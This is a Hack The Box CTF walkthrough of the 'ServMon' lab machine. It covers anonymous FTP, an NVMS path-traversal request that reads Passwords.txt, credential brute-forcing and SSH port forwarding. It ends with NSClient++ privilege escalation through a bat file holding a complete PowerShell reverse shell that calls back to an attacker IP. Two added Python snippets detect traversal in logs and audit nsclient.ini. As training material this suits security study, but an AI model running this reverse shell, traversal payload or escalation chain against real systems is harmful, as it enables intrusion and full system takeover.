
Jan 22, 2025 - 23:15
ServMon walkthrough - Hack The Box CTF

IP: 10.10.10.184

nmap -sC -sV -Pn 10.10.10.184        
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-30 06:55 EST
Nmap scan report for 10.10.10.184
Host is up (0.079s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_02-28-22  06:35PM                 Users
| ftp-syst: 
|_  SYST: Windows_NT
22/tcp   open  ssh           OpenSSH for_Windows_8.0 (protocol 2.0)
| ssh-hostkey: 
|   3072 c7:1a:f6:81:ca:17:78:d0:27:db:cd:46:2a:09:2b:54 (RSA)
|   256 3e:63:ef:3b:6e:3e:4a:90:f3:4c:02:e9:40:67:2e:42 (ECDSA)
|_  256 5a:48:c8:cd:39:78:21:29:ef:fb:ae:82:1d:03:ad:af (ED25519)
80/tcp   open  http
|_http-title: Site doesn't have a title (text/html).
| fingerprint-strings: 
|   GetRequest, HTTPOptions, RTSPRequest: 
|     HTTP/1.1 200 OK
|     Content-type: text/html
|     Content-Length: 340
|     Connection: close
|     AuthInfo: 
|     
|     
|     
|     
|     window.location.href = "Pages/login.htm";
|     
|     
|     
|     
|     HTTP/1.1 408 Request Timeout
|     Content-type: text/html
|     Content-Length: 0
|     Connection: close
|_    AuthInfo:
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
5666/tcp open  tcpwrapped
6699/tcp open  napster?
8443/tcp open  ssl/https-alt
|_ssl-date: TLS randomness does not represent time
| http-title: NSClient++
|_Requested resource was /index.html
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after:  2021-01-13T13:24:20
| fingerprint-strings: 
|   FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions: 
|     HTTP/1.1 404
|     Content-Length: 18
|     Document not found
|   GetRequest: 
|     HTTP/1.1 302
|     Content-Length: 0
|     Location: /index.html
|     k/ns
|     workers
|_    jobs
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_clock-skew: 1m39s
| smb2-time: 
|   date: 2024-12-30T11:59:05
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 147.76 seconds

On port 21 we have "Anonymous FTP login allowed", so let's try it:

$ ftp 10.10.10.184 
Connected to 10.10.10.184.
220 Microsoft FTP Service
Name (10.10.10.184:kali): anonymous       
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||49703|)
125 Data connection already open; Transfer starting.
02-28-22  06:35PM                 Users
226 Transfer complete.
ftp> ls Users
229 Entering Extended Passive Mode (|||49704|)
125 Data connection already open; Transfer starting.
02-28-22  06:36PM                 Nadine
02-28-22  06:37PM                 Nathan
226 Transfer complete.
ftp> ls users/Nadine
229 Entering Extended Passive Mode (|||49705|)
125 Data connection already open; Transfer starting.
02-28-22  06:36PM                  168 Confidential.txt
226 Transfer complete.
ftp> get Users\\Nadine\\Confidential.txt
local: Users\Nadine\Confidential.txt remote: Users\Nadine\Confidential.txt
229 Entering Extended Passive Mode (|||49706|)
125 Data connection already open; Transfer starting.
100% |**************************************************************************************************************************************************************************************|   168        1.47 KiB/s    00:00 ETA
226 Transfer complete.
WARNING! 6 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
168 bytes received in 00:00 (1.47 KiB/s)
ftp> ls Users/Nathan
229 Entering Extended Passive Mode (|||49707|)
125 Data connection already open; Transfer starting.
02-28-22  06:36PM                  182 Notes to do.txt
226 Transfer complete.
ftp> get Users\\Nathan\\do.txt
local: Users\Nathan\do.txt remote: Users\Nathan\do.txt
229 Entering Extended Passive Mode (|||49708|)
550 The system cannot find the file specified. 
ftp> get "Users\\Nathan\\Notes to do.txt"
local: Users\Nathan\Notes to do.txt remote: Users\Nathan\Notes to do.txt
229 Entering Extended Passive Mode (|||49709|)
125 Data connection already open; Transfer starting.
100% |**************************************************************************************************************************************************************************************|   182        1.74 KiB/s    00:00 ETA
226 Transfer complete.
WARNING! 4 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
182 bytes received in 00:00 (1.73 KiB/s)
ftp> exit
221 Goodbye.

I downloaded both files, Confidential.txt and Notes to do.txt.

Confidential.txt:

Nathan,
I left your Passwords.txt file on your Desktop. Please remove this once you
have edited it yourself and place it back into the secure folder.
Regards
Nadine

So there's a Passwords.txt on Nathan's desktop.

Notes to do.txt:

1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint

There's still public access to NVMS (item 4 is not marked Complete).

SSH needs credentials, so I will check port 80 first.

We land on http://10.10.10.184/Pages/login.htm, a login page for NVMS.

As the file Notes to do.txt suggests, the default password admin:123456 was already changed.

I found this exploit for NVMS: https://www.exploit-db.com/exploits/47774

Now we can recreate their PoC by sending a GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1 request to the page. I will use Burp Proxy and intercept the GET /Pages/login.htm HTTP/1.1 request.

Now change it to GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1

The proof of concept works, so now we can try to retrieve the file Passwords.txt from Nathan's desktop.

1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
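From the defender's side, an added example (not part of the walkthrough) that resolves request paths from web access logs and flags traversal attempts like the win.ini and Passwords.txt reads above. The log lines are constructed in combined log format and the sensitive-path markers are my own choice.

```python
from __future__ import annotations
import re
from urllib.parse import unquote

# Files the walkthrough's traversal actually reached: the PoC read
# windows/win.ini, then a user's Desktop\Passwords.txt. Constructed list.
SENSITIVE_MARKERS = ("windows/win.ini", "/desktop/", "passwords.txt")

# Combined-log-format request line: "GET /path HTTP/1.1" 200
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')


def normalize_path(raw_path: str) -> tuple[str, int]:
    """Resolve a request path as a lenient server would; return (path, escapes).

    escapes counts '..' segments that climbed above the web root. Percent
    decoding repeats until stable and '\\' folds to '/' so Windows separators
    do not hide a traversal.
    """
    path = raw_path.split("?", 1)[0]
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    parts, escapes = [], 0
    for seg in path.replace("\\", "/").split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if parts:
                parts.pop()
            else:
                escapes += 1
            continue
        parts.append(seg)
    return "/" + "/".join(parts), escapes


def classify_request(log_line: str) -> dict | None:
    """Return a finding for a traversal attempt, or None for a normal request."""
    m = LOG_RE.search(log_line)
    if not m:
        return None
    resolved, escapes = normalize_path(m.group("path"))
    sensitive = any(marker in resolved.lower() for marker in SENSITIVE_MARKERS)
    if escapes == 0 and not sensitive:
        return None
    return {
        "method": m.group("method"),
        "resolved": resolved,
        "escapes": escapes,
        "sensitive_target": sensitive,
        "status": int(m.group("status")),
        # 200 on an escaping path means the server really served the file.
        "served": escapes > 0 and m.group("status") == "200",
    }


def scan(log_text: str) -> list[dict]:
    """Run classify_request over every line and keep only the findings."""
    return [f for f in map(classify_request, log_text.splitlines()) if f]


# Constructed access-log sample: a normal login-page hit, the win.ini PoC
# request quoted in the walkthrough, a Desktop read, and a benign 404.
SAMPLE_LOG = """\
10.10.14.5 - - [30/Dec/2024:06:59:01 -0500] "GET /Pages/login.htm HTTP/1.1" 200 340
10.10.14.5 - - [30/Dec/2024:07:02:17 -0500] "GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1" 200 92
10.10.14.5 - - [30/Dec/2024:07:05:40 -0500] "GET /../../../Users/Nathan/Desktop/Passwords.txt HTTP/1.1" 200 156
10.10.14.5 - - [30/Dec/2024:07:06:02 -0500] "GET /images/logo.png HTTP/1.1" 404 0
"""
```

Running scan(SAMPLE_LOG) yields two findings, both with served set, which is the signal that the traversal was not just attempted but answered with content.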

Let's attempt brute forcing all the login services we have; I will start with SMB and SSH.

I copied the passwords to a passwords.txt file and created a users.txt file:

nathan
nadine
administrator
admin

If these users don't work, we can try the most common names or play around with the names we have.

crackmapexec smb 10.10.10.184 -u users.txt -p passwords.txt

We found a valid credential for both SMB and SSH; I will start with SSH because it gives us more access.

nadine:L1k3B1gBut7s@W0rk

ssh nadine@10.10.10.184

First, check privileges:

nadine@SERVMON C:\Users\Nadine>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

nadine@SERVMON C:\Users\Nadine>whoami /groups

GROUP INFORMATION
-----------------

Group Name                             Type             SID          Attributes
====================================== ================ ============ ==================================================
Everyone                               Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                   Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization         Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account             Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication       Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label            S-1-16-8192

Looks like a low-privileged user.

The user flag is in C:\Users\Nadine\Desktop\user.txt

Now we need privilege escalation to get the root flag; let's look for vulnerabilities.

nadine@SERVMON C:\Program Files>dir                        
 Volume in drive C has no label.                                                   
 Volume Serial Number is 20C1-47A1                                                 

 Directory of C:\Program Files                                                     

02/28/2022  06:55 PM              .                                           
02/28/2022  06:55 PM              ..                                          
03/01/2022  01:20 AM              Common Files                                
11/11/2019  06:52 PM              internet explorer                           
02/28/2022  06:07 PM              MSBuild                                     
02/28/2022  06:55 PM              NSClient++                                  
02/28/2022  06:46 PM              NVMS-1000                                   
02/28/2022  06:32 PM              OpenSSH-Win64                               
02/28/2022  06:07 PM              Reference Assemblies                        
02/28/2022  05:44 PM              VMware                                      
11/11/2019  06:52 PM              Windows Defender                            
11/11/2019  06:52 PM              Windows Defender Advanced Threat Protection 
09/14/2018  11:19 PM              Windows Mail                                
11/11/2019  06:52 PM              Windows Media Player                        
09/14/2018  11:19 PM              Windows Multimedia Platform                 
09/14/2018  11:28 PM              windows nt                                  
11/11/2019  06:52 PM              Windows Photo Viewer                        
09/14/2018  11:19 PM              Windows Portable Devices                    
09/14/2018  11:19 PM              Windows Security                            
02/28/2022  06:25 PM              WindowsPowerShell                           
               0 File(s)              0 bytes                                      
              20 Dir(s)   6,046,040,064 bytes free 

There is the NSClient++ program that we saw in the nmap scan on port 8443 (HTTPS).

nadine@SERVMON C:\Program Files>cd "NSClient++"

nadine@SERVMON C:\Program Files\NSClient++>dir 
 Volume in drive C has no label.                                               
 Volume Serial Number is 20C1-47A1                                             

 Directory of C:\Program Files\NSClient++                                      

02/28/2022  06:55 PM              .                                       
02/28/2022  06:55 PM              ..                                      
12/09/2015  12:17 AM            28,672 boost_chrono-vc110-mt-1_58.dll          
12/09/2015  12:17 AM            50,688 boost_date_time-vc110-mt-1_58.dll       
12/09/2015  12:17 AM           117,760 boost_filesystem-vc110-mt-1_58.dll      
12/09/2015  12:22 AM           439,296 boost_program_options-vc110-mt-1_58.dll 
12/09/2015  12:23 AM           256,000 boost_python-vc110-mt-1_58.dll          
12/09/2015  12:17 AM           765,952 boost_regex-vc110-mt-1_58.dll           
12/09/2015  12:16 AM            19,456 boost_system-vc110-mt-1_58.dll          
12/09/2015  12:18 AM           102,400 boost_thread-vc110-mt-1_58.dll          
01/14/2020  01:24 PM                51 boot.ini                                
01/18/2018  03:51 PM           157,453 changelog.txt
01/28/2018  10:33 PM         1,210,392 check_nrpe.exe
02/28/2022  06:55 PM              crash-dumps
11/05/2017  09:09 PM           318,464 Google.ProtocolBuffers.dll
12/08/2015  11:16 PM         1,655,808 libeay32.dll 
11/05/2017  10:04 PM            18,351 license.txt
10/05/2017  06:19 AM           203,264 lua.dll
02/28/2022  06:55 PM              modules
04/10/2020  05:32 PM             2,683 nsclient.ini
01/11/2025  04:06 AM            40,561 nsclient.log
11/05/2017  09:42 PM            55,808 NSCP.Core.dll
01/28/2018  10:32 PM         4,765,208 nscp.exe
11/05/2017  09:42 PM           483,328 NSCP.Protobuf.dll
11/19/2017  04:18 PM           534,016 nscp_json_pb.dll
11/19/2017  03:55 PM         2,090,496 nscp_lua_pb.dll
01/23/2018  08:57 PM           507,904 nscp_mongoose.dll
11/19/2017  03:49 PM         2,658,304 nscp_protobuf.dll
11/05/2017  10:04 PM             3,921 old-settings.map
01/28/2018  10:21 PM         1,973,760 plugin_api.dll
05/23/2015  07:44 AM         3,017,216 python27.dll
09/27/2015  02:42 PM        28,923,515 python27.zip
01/28/2018  10:34 PM           384,536 reporter.exe
02/28/2022  06:55 PM              scripts
02/28/2022  06:55 PM              security
12/08/2015  11:16 PM           348,160 ssleay32.dll
05/23/2015  07:44 AM           689,664 unicodedata.pyd
02/28/2022  06:55 PM              web
11/05/2017  09:20 PM         1,273,856 where_filter.dll
05/23/2015  07:44 AM            47,616 _socket.pyd
              33 File(s)     53,144,559 bytes
               7 Dir(s)   6,013,689,856 bytes free

We have a readable configuration file, nsclient.ini.

Program version:

nadine@SERVMON C:\Program Files\NSClient++>nscp.exe --version
NSClient++, Version: 0.5.2.35 2018-01-28, Platform: x64

I found this vulnerability for this version: https://www.exploit-db.com/exploits/46802
I can create a simple reverse shell in C:\Windows\Temp and, by following the PoC, make the system execute the file, which gives reverse shell access with SYSTEM privileges.

1. We already have the admin password.

2. Scheduler and CheckExternalScripts are already enabled in the nsclient.ini configuration file.

3. Create the reverse shell file:

sshpass -p 'L1k3B1gBut7s@W0rk' ssh  nadine@10.10.10.184

cd C:\Windows\Temp

echo "powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.5',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"" > meow.bat

4. Set up a listener on the attacking machine: nc -nlvvp 4444

5. Before we can do step five we need to be able to reach the site as 127.0.0.1: as we saw in the nsclient.ini file, and as we expected from the file 'Notes to do.txt' (Lock down the NSClient Access - Complete), access is limited to localhost.

We can use SSH local port forwarding:

sshpass -p 'L1k3B1gBut7s@W0rk' ssh -L 8443:127.0.0.1:8443 nadine@10.10.10.184

(The screenshot of the scheduled task command is missing; it's supposed to be C:\Windows\Temp\meow.bat, but I forgot to capture it.)

Now configure a scheduled task in NSClient++.

Open the listener: nc -lvnp 4444

Reload the server, and the shell comes back to the listener:

listening on [any] 4444 ...
connect to [10.10.14.05] from (UNKNOWN) [10.10.10.184] 52595
Microsoft Windows [Version 10.0.17763.864]
C:\Program Files\NSClient++>whoami
whoami
nt authority\system

The root flag is in C:\Users\Administrator\Desktop\root.txt
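As a defensive wrap-up, an added example (not from the walkthrough or the NSClient++ project) that audits an nsclient.ini for the three conditions steps 1, 2 and 5 relied on: a known web admin password, CheckExternalScripts plus Scheduler enabled alongside the web server, and an allowed-hosts restriction to 127.0.0.1 that SSH port forwarding defeated. The sample ini and its key names ([/modules], [/settings/default], allowed hosts, allow arguments) are my recollection of the shipped file's layout, not copied from the box.

```python
from __future__ import annotations
import io
from configparser import ConfigParser

# Constructed sample following the layout of an NSClient++ nsclient.ini:
# modules under [/modules], globals under [/settings/default]. Key names
# are from memory of the shipped file; the password is a placeholder.
SAMPLE_INI = """\
[/modules]
CheckExternalScripts = enabled
Scheduler = enabled
WEBServer = enabled
CheckSystem = enabled

[/settings/default]
allowed hosts = 127.0.0.1
password = <admin-password-placeholder>

[/settings/external scripts]
allow arguments = true
"""

ON = ("enabled", "true", "1")


def load_ini(text: str) -> ConfigParser:
    """Parse nsclient.ini text, preserving key case (module names are CamelCase)."""
    cp = ConfigParser(interpolation=None)
    cp.optionxform = str
    cp.read_file(io.StringIO(text))
    return cp


def module_enabled(cp: ConfigParser, name: str) -> bool:
    return cp.get("/modules", name, fallback="").strip().lower() in ON


def audit(cp: ConfigParser) -> list[tuple[str, str]]:
    """Return (severity, message) findings for the settings the escalation relied on."""
    web = module_enabled(cp, "WEBServer")
    ext = module_enabled(cp, "CheckExternalScripts")
    sched = module_enabled(cp, "Scheduler")
    hosts = cp.get("/settings/default", "allowed hosts", fallback="").strip()
    password = cp.get("/settings/default", "password", fallback="").strip()
    allow_args = cp.get("/settings/external scripts", "allow arguments",
                        fallback="false").strip().lower() in ON
    findings = []
    if web and not password:
        findings.append(("HIGH", "WEBServer enabled without an admin password"))
    if web and ext and sched:
        # This is the combination the walkthrough used: a web admin schedules
        # an external script and the service runs it as SYSTEM.
        findings.append(("HIGH", "WEBServer + CheckExternalScripts + Scheduler: a web "
                                 "admin can schedule arbitrary scripts as the service "
                                 "account; disable whichever module is not needed"))
    if ext and allow_args:
        findings.append(("MEDIUM", "external scripts accept caller-supplied arguments"))
    if web and hosts in ("", "*"):
        findings.append(("HIGH", "web interface reachable from any host"))
    elif web and hosts == "127.0.0.1":
        findings.append(("INFO", "web interface limited to 127.0.0.1: any local account "
                                 "or an SSH -L tunnel still reaches it, so the password "
                                 "is the only remaining control"))
    if password:
        findings.append(("INFO", "plaintext web password in nsclient.ini: confirm the "
                                 "file ACL denies read access to non-administrators"))
    return findings
```

On the sample, audit(load_ini(SAMPLE_INI)) reports one HIGH, one MEDIUM and two INFO findings; flipping Scheduler to disabled and allow arguments to false removes every HIGH.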
